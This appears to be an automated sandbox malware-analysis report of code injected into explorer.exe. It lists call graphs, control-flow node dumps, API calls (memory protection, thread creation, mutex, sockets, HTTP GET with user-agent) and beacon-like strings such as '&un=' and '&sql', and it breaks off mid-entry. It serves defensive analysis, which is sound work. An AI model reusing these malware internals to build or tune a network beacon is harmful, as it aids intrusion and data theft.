8c9c1f9 13561->13563 13562 8c9c3df 13562->13508 13563->13562 13564 8ca6232 NtCreateFile 13563->13564 13565 8c9c3c9 13564->13565 13566 8ca6232 NtCreateFile 13565->13566 13566->13562 13568 8c9bf70 13567->13568 13569 8c9bf84 13567->13569 13568->13505 13570 8ca6232 NtCreateFile 13569->13570 13571 8c9c046 13570->13571 13571->13505 13573 8c9b031 13572->13573 13574 8c9b0cd 13573->13574 13575 8ca6f82 6 API calls 13573->13575 13574->13515 13575->13574 13756 8c9eedd 13758 8c9ef06 13756->13758 13757 8c9efa4 13758->13757 13759 8c9b8f2 NtProtectVirtualMemory 13758->13759 13760 8c9ef9c 13759->13760 13761 8ca2382 2 API calls 13760->13761 13761->13757 13871 8ca8a1f 13872 8ca8a25 13871->13872 13875 8c9c5f2 13872->13875 13874 8ca8a3d 13876 8c9c5fb 13875->13876 13877 8c9c60e 13875->13877 13876->13877 13878 8ca1662 6 API calls 13876->13878 13877->13874 13878->13877 13733 8ca7e12 13734 8ca7e45 NtProtectVirtualMemory 13733->13734 13735 8ca6942 13733->13735 13736 8ca7e70 13734->13736 13735->13734 13879 8c9c613 13880 8c9c620 13879->13880 13881 8c9c684 13880->13881 13882 8ca7e12 NtProtectVirtualMemory 13880->13882 13882->13880 13762 8ca0cd4 13764 8ca0cd8 13762->13764 13763 8ca1022 13764->13763 13768 8ca0352 13764->13768 13766 8ca0f0d 13766->13763 13777 8ca0792 13766->13777 13770 8ca039e 13768->13770 13769 8ca058e 13769->13766 13770->13769 13771 8ca04ec 13770->13771 13773 8ca0595 13770->13773 13772 8ca6232 NtCreateFile 13771->13772 13775 8ca04ff 13772->13775 13773->13769 13774 8ca6232 NtCreateFile 13773->13774 13774->13769 13775->13769 13776 8ca6232 NtCreateFile 13775->13776 13776->13769 13778 8ca07e0 13777->13778 13779 8ca6232 NtCreateFile 13778->13779 13781 8ca090c 13779->13781 13780 8ca0af3 13780->13766 13781->13780 13782 8ca0352 NtCreateFile 13781->13782 13783 8ca0602 NtCreateFile 13781->13783 13782->13781 13783->13781 13883 8ca222a 13884 8ca225e 13883->13884 13885 8ca18c2 ObtainUserAgentString 13884->13885 13886 8ca226b 13885->13886 13832 8ca8aa9 13833 8ca8aaf 13832->13833 13836 8ca3212 13833->13836 13835 8ca8ac7 13837 8ca321b 13836->13837 13838 8ca3237 13836->13838 13837->13838 13839 8ca30c2 6 API calls 13837->13839 13838->13835 13839->13838 13989 8ca372e 13990 8ca376a 13989->13990 13991 8ca3788 connect 13989->13991 13990->13991 13576 8ca7bac 13577 8ca7bb1 13576->13577 13610 8ca7bb6 13577->13610 13611 8c9db72 13577->13611 13579 8ca7c2c 13580 8ca7c85 13579->13580 13582 8ca7c69 13579->13582 13583 8ca7c54 13579->13583 13579->13610 13581 8ca5ab2 NtProtectVirtualMemory 13580->13581 13586 8ca7c8d 13581->13586 13584 8ca7c6e 13582->13584 13585 8ca7c80 13582->13585 13587 8ca5ab2 NtProtectVirtualMemory 13583->13587 13589 8ca5ab2 NtProtectVirtualMemory 13584->13589 13585->13580 13590 8ca7c97 13585->13590 13647 8c9f102 13586->13647 13588 8ca7c5c 13587->13588 13633 8c9eee2 13588->13633 13595 8ca7c76 13589->13595 13592 8ca7cbe 13590->13592 13593 8ca7c9c 13590->13593 13597 8ca7cd9 13592->13597 13598 8ca7cc7 13592->13598 13592->13610 13615 8ca5ab2 13593->13615 13639 8c9efc2 13595->13639 13601 8ca5ab2 NtProtectVirtualMemory 13597->13601 13597->13610 13600 8ca5ab2 NtProtectVirtualMemory 13598->13600 13603 8ca7ccf 13600->13603 13604 8ca7ce5 13601->13604 13657 8c9f2f2 13603->13657 13675 8c9f712 13604->13675 13613 8c9db93 13611->13613 13612 8c9dcce 13612->13579 13613->13612 13614 8c9dcb5 CreateMutexW 13613->13614 13614->13612 13617 8ca5adf 13615->13617 13616 8ca5ebc 13625 8c9ede2 13616->13625 13617->13616 13687 8c9b8f2 13617->13687 13619 8ca5e5c 13620 8c9b8f2 NtProtectVirtualMemory 13619->13620 13621 8ca5e7c 13620->13621 13622 8c9b8f2 NtProtectVirtualMemory 13621->13622 13623 8ca5e9c 13622->13623 13624 8c9b8f2 NtProtectVirtualMemory 13623->13624 13624->13616 13626 8c9edf0 13625->13626 13628 8c9eecd 13626->13628 13712 8ca2382 13626->13712 13629 8c9b412 13628->13629 13631 8c9b440 13629->13631 13630 8c9b473 13630->13610 13631->13630 13632 8c9b44d CreateThread 13631->13632 13632->13610 13635 8c9ef06 13633->13635 13634 8c9efa4 13634->13610 13635->13634 13636 8c9b8f2 NtProtectVirtualMemory 13635->13636 13637 8c9ef9c 13636->13637 13638 8ca2382 2 API calls 13637->13638 13638->13634 13641 8c9f016 13639->13641 13640 8c9f0f0 13640->13610 13641->13640 13644 8c9b8f2 NtProtectVirtualMemory 13641->13644 13645 8c9f0bb 13641->13645 13642 8c9f0e8 13643 8ca2382 2 API calls 13642->13643 13643->13640 13644->13645 13645->13642 13646 8c9b8f2 NtProtectVirtualMemory 13645->13646 13646->13642 13649 8c9f137 13647->13649 13648 8c9f2d5 13648->13610 13649->13648 13650 8c9b8f2 NtProtectVirtualMemory 13649->13650 13651 8c9f28a 13650->13651 13652 8c9b8f2 NtProtectVirtualMemory 13651->13652 13655 8c9f2a9 13652->13655 13653 8c9f2cd 13654 8ca2382 2 API calls 13653->13654 13654->13648 13655->13653 13656 8c9b8f2 NtProtectVirtualMemory 13655->13656 13656->13653 13659 8c9f349 13657->13659 13658 8c9f49f 13660 8c9b8f2 NtProtectVirtualMemory 13658->13660 13664 8c9f4c3 13658->13664 13659->13658 13661 8c9b8f2 NtProtectVirtualMemory 13659->13661 13660->13664 13662 8c9f480 13661->13662 13663 8c9b8f2 NtProtectVirtualMemory 13662->13663 13663->13658 13665 8c9b8f2 NtProtectVirtualMemory 13664->13665 13666 8c9f597 13664->13666 13665->13666 13667 8c9b8f2 NtProtectVirtualMemory 13666->13667 13669 8c9f5bf 13666->13669 13667->13669 13668 8c9f6e1 13670 8ca2382 2 API calls 13668->13670 13671 8c9b8f2 NtProtectVirtualMemory 13669->13671 13672 8c9f6b9 13669->13672 13673 8c9f6e9 13670->13673 13671->13672 13672->13668 13674 8c9b8f2 NtProtectVirtualMemory 13672->13674 13673->13610 13674->13668 13676 8c9f767 13675->13676 13677 8c9b8f2 NtProtectVirtualMemory 13676->13677 13681 8c9f903 13676->13681 13678 8c9f8e3 13677->13678 13679 8c9b8f2 NtProtectVirtualMemory 13678->13679 13679->13681 13680 8c9f9b7 13682 8ca2382 2 API calls 13680->13682 13683 8c9b8f2 NtProtectVirtualMemory 13681->13683 13684 8c9f992 13681->13684 13685 8c9f9bf 13682->13685 13683->13684 13684->13680 13686 8c9b8f2 NtProtectVirtualMemory 13684->13686 13685->13610 13686->13680 13688 8c9b987 13687->13688 13689 8c9b9b2 13688->13689 13702 8c9c622 13688->13702 13691 8c9bc0c 13689->13691 13692 8c9bba2 13689->13692 13694 8c9bac5 13689->13694 13691->13619 13693 8ca7e12 NtProtectVirtualMemory 13692->13693 13701 8c9bb5b 13693->13701 13706 8ca7e12 13694->13706 13696 8ca7e12 NtProtectVirtualMemory 13696->13691 13697 8c9bae3 13697->13691 13698 8c9bb3d 13697->13698 13699 8ca7e12 NtProtectVirtualMemory 13697->13699 13700 8ca7e12 NtProtectVirtualMemory 13698->13700 13699->13698 13700->13701 13701->13691 13701->13696 13703 8c9c67a 13702->13703 13704 8c9c684 13703->13704 13705 8ca7e12 NtProtectVirtualMemory 13703->13705 13704->13689 13705->13703 13707 8ca7e45 NtProtectVirtualMemory 13706->13707 13710 8ca6942 13706->13710 13709 8ca7e70 13707->13709 13709->13697 13711 8ca6967 13710->13711 13711->13707 13713 8ca23c7 13712->13713 13718 8ca2232 13713->13718 13715 8ca2438 13722 8ca3632 13715->13722 13717 8ca2e7b 13717->13628 13719 8ca225e 13718->13719 13725 8ca18c2 13719->13725 13721 8ca226b 13721->13715 13723 8ca368b WSAStartup 13722->13723 13724 8ca366d 13722->13724 13723->13717 13724->13723 13727 8ca1934 13725->13727 13726 8ca19a6 13726->13721 13727->13726 13728 8ca1995 ObtainUserAgentString 13727->13728 13728->13726 13887 8ca362c 13888 8ca368b WSAStartup 13887->13888 13889 8ca366d 13887->13889 13889->13888 13890 8c9c42e 13891 8c9c45b 13890->13891 13898 8c9c4c9 13890->13898 13892 8ca6232 NtCreateFile 13891->13892 13891->13898 13893 8c9c496 13892->13893 13894 8c9c4c5 13893->13894 13896 8c9c082 NtCreateFile 13893->13896 13895 8ca6232 NtCreateFile 13894->13895 13894->13898 13895->13898 13897 8c9c4b6 13896->13897 13897->13894 13899 8c9bf52 NtCreateFile 13897->13899 13899->13894 13784 8ca0ce2 13786 8ca0dd9 13784->13786 13785 8ca1022 13786->13785 13787 8ca0352 NtCreateFile 13786->13787 13788 8ca0f0d 13787->13788 13788->13785 13789 8ca0792 NtCreateFile 13788->13789 13789->13788 13790 8ca32e4 13791 8ca336f 13790->13791 13792 8ca3305 13790->13792 13792->13791 13794 8ca30c2 13792->13794 13795 8ca30cb 13794->13795 13797 8ca31f0 13794->13797 13796 8ca6f82 6 API calls 13795->13796 13795->13797 13796->13797 13797->13791 13967 8c9db66 13969 8c9db6a 13967->13969 13968 8c9dcce 13969->13968 13970 8c9dcb5 CreateMutexW 13969->13970 13970->13968 13900 8ca583a 13901 8ca5841 13900->13901 13902 8ca6f82 6 API calls 13901->13902 13903 8ca58c5 13902->13903 13904 8ca5906 13903->13904 13905 8ca6232 NtCreateFile 13903->13905 13905->13904 13971 8ca6f7a 13972 8ca6fb8 13971->13972 13973 8ca35b2 socket 13972->13973 13974 8ca7081 13972->13974 13982 8ca7022 13972->13982 13973->13974 13975 8ca7134 13974->13975 13977 8ca7117 getaddrinfo 13974->13977 13974->13982 13976 8ca3732 connect 13975->13976 13978 8ca71b2 13975->13978 13975->13982 13976->13978 13977->13975 13979 8ca36b2 send 13978->13979 13978->13982 13981 8ca7729 13979->13981 13980 8ca77f4 setsockopt recv 13980->13982 13981->13980 13981->13982 13798 8c9f0fb 13800 8c9f137 13798->13800 13799 8c9f2d5 13800->13799 13801 8c9b8f2 NtProtectVirtualMemory 13800->13801 13802 8c9f28a 13801->13802 13803 8c9b8f2 NtProtectVirtualMemory 13802->13803 13806 8c9f2a9 13803->13806 13804 8c9f2cd 13805 8ca2382 2 API calls 13804->13805 13805->13799 13806->13804 13807 8c9b8f2 NtProtectVirtualMemory 13806->13807 13807->13804 13840 8ca30b9 13841 8ca30ed 13840->13841 13843 8ca31f0 13840->13843 13842 8ca6f82 6 API calls 13841->13842 13841->13843 13842->13843 13844 8ca18be 13846 8ca18c3 13844->13846 13845 8ca19a6 13846->13845 13847 8ca1995 ObtainUserAgentString 13846->13847 13847->13845 13983 8ca237e 13984 8ca23c7 13983->13984 13985 8ca2232 ObtainUserAgentString 13984->13985 13986 8ca2438 13985->13986 13987 8ca3632 WSAStartup 13986->13987 13988 8ca2e7b 13987->13988 13926 8c9efbf 13927 8c9f016 13926->13927 13929 8c9f0bb 13927->13929 13931 8c9b8f2 NtProtectVirtualMemory 13927->13931 13932 8c9f0f0 13927->13932 13928 8c9f0e8 13930 8ca2382 2 API calls 13928->13930 13929->13928 13933 8c9b8f2 NtProtectVirtualMemory 13929->13933 13930->13932 13931->13929 13933->13928 13737 8ca6232 13738 8ca625c 13737->13738 13740 8ca6334 13737->13740 13739 8ca6410 NtCreateFile 13738->13739 13738->13740 13739->13740 13808 8c9b0f1 13809 8c9b109 13808->13809 13810 8c9b1d3 13808->13810 13811 8c9b012 6 API calls 13809->13811 13812 8c9b113 13811->13812 13812->13810 13813 8ca6f82 6 API calls 13812->13813 13813->13810 13910 8c9c5f1 13911 8c9c60e 13910->13911 13912 8c9c606 13910->13912 13913 8ca1662 6 API calls 13912->13913 13913->13911 13934 8ca89b3 13935 8ca89bd 13934->13935 13938 8c9d6d2 13935->13938 13937 8ca89e0 13939 8c9d6f7 13938->13939 13941 8c9d704 13938->13941 13940 8c9b0f2 6 API calls 13939->13940 13942 8c9d6ff 13940->13942 13941->13942 13943 8c9d72d 13941->13943 13945 8c9d737 13941->13945 13942->13937 13947 8ca32c2 13943->13947 13945->13942 13946 8ca6f82 6 API calls 13945->13946 13946->13942 13948 8ca32df 13947->13948 13949 8ca32cb 13947->13949 13948->13942 13949->13948 13950 8ca30c2 6 API calls 13949->13950 13950->13948 13914 8ca89f1 13915 8ca89f7 13914->13915 13918 8c9d852 13915->13918 13917 8ca8a0f 13919 8c9d865 13918->13919 13920 8c9d8e4 13918->13920 13919->13920 13922 8c9d87e 13919->13922 13923 8c9d887 13919->13923 13920->13917 13921 8ca336f 13921->13917 13922->13921 13925 8ca30c2 6 API calls 13922->13925 13923->13920 13924 8ca1662 6 API calls 13923->13924 13924->13920 13925->13921 13814 8c9f2f4 13815 8c9f349 13814->13815 13816 8c9f49f 13815->13816 13818 8c9b8f2 NtProtectVirtualMemory 13815->13818 13817 8c9b8f2 NtProtectVirtualMemory 13816->13817 13821 8c9f4c3 13816->13821 13817->13821 13819 8c9f480 13818->13819 13820 8c9b8f2 NtProtectVirtualMemory 13819->13820 13820->13816 13822 8c9b8f2 NtProtectVirtualMemory 13821->13822 13823 8c9f597 13821->13823 13822->13823 13824 8c9b8f2 NtProtectVirtualMemory 13823->13824 13827 8c9f5bf 13823->13827 13824->13827 13825 8c9f6b9 13826 8c9f6e1 13825->13826 13831 8c9b8f2 NtProtectVirtualMemory 13825->13831 13828 8ca2382 2 API calls 13826->13828 13827->13825 13829 8c9b8f2 NtProtectVirtualMemory 13827->13829 13830 8c9f6e9 13828->13830 13829->13825 13831->13826

                                          Executed Functions

                                          Function 08CA6F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 8ca6f82-8ca6fb6 1 8ca6fb8-8ca6fbc 0->1 2 8ca6fd6-8ca6fd9 0->2 1->2 5 8ca6fbe-8ca6fc2 1->5 3 8ca78fe-8ca790c 2->3 4 8ca6fdf-8ca6fed 2->4 6 8ca6ff3-8ca6ff7 4->6 7 8ca78f6-8ca78f7 4->7 5->2 8 8ca6fc4-8ca6fc8 5->8 9 8ca6ff9-8ca6ffd 6->9 10 8ca6fff-8ca7000 6->10 7->3 8->2 11 8ca6fca-8ca6fce 8->11 9->10 12 8ca700a-8ca7010 9->12 10->12 11->2 13 8ca6fd0-8ca6fd4 11->13 14 8ca703a-8ca7060 12->14 15 8ca7012-8ca7020 12->15 13->2 13->4 17 8ca7068-8ca707c call 8ca35b2 14->17 18 8ca7062-8ca7066 14->18 15->14 16 8ca7022-8ca7026 15->16 16->7 19 8ca702c-8ca7035 16->19 22 8ca7081-8ca70a2 17->22 18->17 20 8ca70a8-8ca70ab 18->20 19->7 23 8ca70b1-8ca70b8 20->23 24 8ca7144-8ca7150 20->24 22->20 27 8ca78ee-8ca78ef 22->27 25 8ca70ba-8ca70dc call 8ca6942 23->25 26 8ca70e2-8ca70f5 23->26 24->27 28 8ca7156-8ca7165 24->28 25->26 26->27 30 8ca70fb-8ca7101 26->30 27->7 31 8ca717f-8ca718f 28->31 32 8ca7167-8ca7178 call 8ca3552 28->32 30->27 34 8ca7107-8ca7109 30->34 36 8ca7191-8ca71ad call 8ca3732 31->36 37 8ca71e5-8ca721b 31->37 32->31 34->27 41 8ca710f-8ca7111 34->41 43 8ca71b2-8ca71da 36->43 39 8ca722d-8ca7231 37->39 40 8ca721d-8ca722b 37->40 45 8ca7233-8ca7245 39->45 46 8ca7247-8ca724b 39->46 44 8ca727f-8ca7280 40->44 41->27 47 8ca7117-8ca7132 getaddrinfo 41->47 43->37 48 8ca71dc-8ca71e1 43->48 52 8ca7283-8ca72e0 call 8ca7d62 call 8ca4482 call 8ca3e72 call 8ca8002 44->52 45->44 49 8ca724d-8ca725f 46->49 50 8ca7261-8ca7265 46->50 47->24 51 8ca7134-8ca713c 47->51 48->37 49->44 53 8ca726d-8ca7279 50->53 54 8ca7267-8ca726b 50->54 51->24 63 8ca72e2-8ca72e6 52->63 64 8ca72f4-8ca7354 call 8ca7d92 52->64 53->44 54->52 54->53 63->64 65 8ca72e8-8ca72ef call 8ca4042 63->65 69 8ca735a-8ca7396 call 8ca7d62 call 8ca8262 call 8ca8002 64->69 70 8ca748c-8ca74b8 call 8ca7d62 call 8ca8262 64->70 65->64 85 8ca73bb-8ca73e9 call 8ca8262 * 2 69->85 86 8ca7398-8ca73b7 call 8ca8262 call 8ca8002 69->86 80 8ca74ba-8ca74d5 70->80 81 8ca74d9-8ca7590 call 8ca8262 * 3 call 8ca8002 * 2 call 8ca4482 70->81 80->81 110 8ca7595-8ca75b9 call 8ca8262 81->110 101 8ca73eb-8ca7410 call 8ca8002 call 8ca8262 85->101 102 8ca7415-8ca741d 85->102 86->85 101->102 103 8ca741f-8ca7425 102->103 104 8ca7442-8ca7448 102->104 107 8ca7467-8ca7487 call 8ca8262 103->107 108 8ca7427-8ca743d 103->108 109 8ca744e-8ca7456 104->109 104->110 107->110 108->110 109->110 115 8ca745c-8ca745d 109->115 120 8ca75bb-8ca75cc call 8ca8262 call 8ca8002 110->120 121 8ca75d1-8ca76ad call 8ca8262 * 7 call 8ca8002 call 8ca7d62 call 8ca8002 call 8ca3e72 call 8ca4042 110->121 115->107 132 8ca76af-8ca76b3 120->132 121->132 134 8ca76ff-8ca772d call 8ca36b2 132->134 135 8ca76b5-8ca76fa call 8ca3382 call 8ca37b2 132->135 145 8ca772f-8ca7735 134->145 146 8ca775d-8ca7761 134->146 155 8ca78e6-8ca78e7 135->155 145->146 151 8ca7737-8ca774c 145->151 147 8ca790d-8ca7913 146->147 148 8ca7767-8ca776b 146->148 157 8ca7779-8ca7784 147->157 158 8ca7919-8ca7920 147->158 152 8ca78aa-8ca78df call 8ca37b2 148->152 153 8ca7771-8ca7773 148->153 151->146 156 8ca774e-8ca7754 151->156 152->155 153->152 153->157 155->27 156->146 163 8ca7756 156->163 159 8ca7786-8ca7793 157->159 160 8ca7795-8ca7796 157->160 158->159 159->160 164 8ca779c-8ca77a0 159->164 160->164 163->146 167 8ca77a2-8ca77af 164->167 168 8ca77b1-8ca77b2 164->168 167->168 170 8ca77b8-8ca77c4 167->170 168->170 173 8ca77c6-8ca77ef call 8ca7d92 call 8ca7d62 170->173 174 8ca77f4-8ca7861 setsockopt recv 170->174 173->174 177 8ca78a3-8ca78a4 174->177 178 8ca7863 174->178 177->152 178->177 181 8ca7865-8ca786a 178->181 181->177 182 8ca786c-8ca7872 181->182 182->177 185 8ca7874-8ca78a1 182->185 185->177 185->178
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: aceebc41ed07f9bb0574feed34d99d7ff2033cb13cd5003b8fa7eff3fb2cea24
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 75528F34618A098FCB29EF68C4947EAB7F1FB54309F50462ED49FD7246DE30A54ACB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA6232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 313 8ca6232-8ca6256 314 8ca625c-8ca6260 313->314 315 8ca68bd-8ca68cd 313->315 314->315 316 8ca6266-8ca62a0 314->316 317 8ca62bf 316->317 318 8ca62a2-8ca62a6 316->318 319 8ca62c6 317->319 318->317 320 8ca62a8-8ca62ac 318->320 321 8ca62cb-8ca62cf 319->321 322 8ca62ae-8ca62b2 320->322 323 8ca62b4-8ca62b8 320->323 325 8ca62f9-8ca630b 321->325 326 8ca62d1-8ca62f7 call 8ca6942 321->326 322->319 323->321 324 8ca62ba-8ca62bd 323->324 324->321 330 8ca6378 325->330 331 8ca630d-8ca6332 325->331 326->325 326->330 332 8ca637a-8ca63a0 330->332 333 8ca63a1-8ca63a8 331->333 334 8ca6334-8ca633b 331->334 335 8ca63aa-8ca63d3 call 8ca6942 333->335 336 8ca63d5-8ca63dc 333->336 337 8ca633d-8ca6360 call 8ca6942 334->337 338 8ca6366-8ca6370 334->338 335->330 335->336 341 8ca63de-8ca640a call 8ca6942 336->341 342 8ca6410-8ca6458 NtCreateFile call 8ca6172 336->342 337->338 338->330 339 8ca6372-8ca6373 338->339 339->330 341->330 341->342 349 8ca645d-8ca645f 342->349 349->330 350 8ca6465-8ca646d 349->350 350->330 351 8ca6473-8ca6476 350->351 352 8ca6478-8ca6481 351->352 353 8ca6486-8ca648d 351->353 352->332 354 8ca648f-8ca64b8 call 8ca6942 353->354 355 8ca64c2-8ca64ec 353->355 354->330 360 8ca64be-8ca64bf 354->360 361 8ca68ae-8ca68b8 355->361 362 8ca64f2-8ca64f5 355->362 360->355 361->330 363 8ca64fb-8ca64fe 362->363 364 8ca6604-8ca6611 362->364 366 8ca655e-8ca6561 363->366 367 8ca6500-8ca6507 363->367 364->332 368 8ca6616-8ca6619 366->368 369 8ca6567-8ca6572 366->369 370 8ca6538-8ca6559 367->370 371 8ca6509-8ca6532 call 8ca6942 367->371 374 8ca66b8-8ca66bb 368->374 375 8ca661f-8ca6626 368->375 377 8ca65a3-8ca65a6 369->377 378 8ca6574-8ca659d call 8ca6942 369->378 376 8ca65e9-8ca65fa 370->376 371->330 371->370 384 8ca6739-8ca673c 374->384 385 8ca66bd-8ca66c4 374->385 380 8ca6628-8ca6651 call 8ca6942 375->380 381 8ca6657-8ca666b call 8ca7e92 375->381 376->364 377->330 383 8ca65ac-8ca65b6 377->383 378->330 378->377 380->330 380->381 381->330 402 8ca6671-8ca66b3 381->402 383->330 391 8ca65bc-8ca65e6 383->391 388 8ca6742-8ca6749 384->388 389 8ca67c4-8ca67c7 384->389 392 8ca66c6-8ca66ef call 8ca6942 385->392 393 8ca66f5-8ca6734 385->393 397 8ca677a-8ca67bf 388->397 398 8ca674b-8ca6774 call 8ca6942 388->398 389->330 399 8ca67cd-8ca67d4 389->399 391->376 392->361 392->393 409 8ca6894-8ca68a9 393->409 397->409 398->361 398->397 404 8ca67fc-8ca6803 399->404 405 8ca67d6-8ca67f6 call 8ca6942 399->405 402->332 407 8ca682b-8ca6835 404->407 408 8ca6805-8ca6825 call 8ca6942 404->408 405->404 407->361 414 8ca6837-8ca683e 407->414 408->407 409->332 414->361 417 8ca6840-8ca6886 414->417 417->409
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: 58a4e29e861f1cce4895014b53d88014c55cc4a17d895eb5a17ec55a647b59fb
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 06224D74A18A0A9FCB59DF28C499AAEF7F1FB68305F44422ED45ED3250DB30E552CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA7E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 457 8ca7e12-8ca7e38 458 8ca7e45-8ca7e6e NtProtectVirtualMemory 457->458 459 8ca7e40 call 8ca6942 457->459 460 8ca7e7d-8ca7e8f 458->460 461 8ca7e70-8ca7e7c 458->461 459->458
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 08CA7E67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: 9c16aad5ec736e7f0a605752aee98fb0107b238c7e627e12bc4606d00dad6afb
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 86019E34668B484F8B88EF6C948412AB7E4FBD9219F000B3EA99AC3250EB64C5414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA7E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 462 8ca7e0a-8ca7e6e call 8ca6942 NtProtectVirtualMemory 465 8ca7e7d-8ca7e8f 462->465 466 8ca7e70-8ca7e7c 462->466
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 08CA7E67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: 23d0edbf62c481d3298c2e13cab20f611fa66e60c23f2406ecfc802bba06d6ec
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 9101A234628B884F8B88EB3C94452A6B3E5FBCE315F000B3EE9DAC3240DB25D5024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA18C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 08CA19A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: ecc4a02385bfb1a5a935c1d94966ff41deec0622716f8f24c572f4e339b5a27b
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 3531AE31A14A0D8FCB45EFA8D8847EEB7F1FB58219F44422AD45EE7340DE788645C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08CA18BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 08CA19A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 5db92931d96628eb5a5b7fa99a9b35b99011691d3080bbef35f35a905f264be5
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 4B219170A14A4D8FCB45EFA8C8847EDBBB1FF5820AF44422AD45AE7340DF748645C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08C9DB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
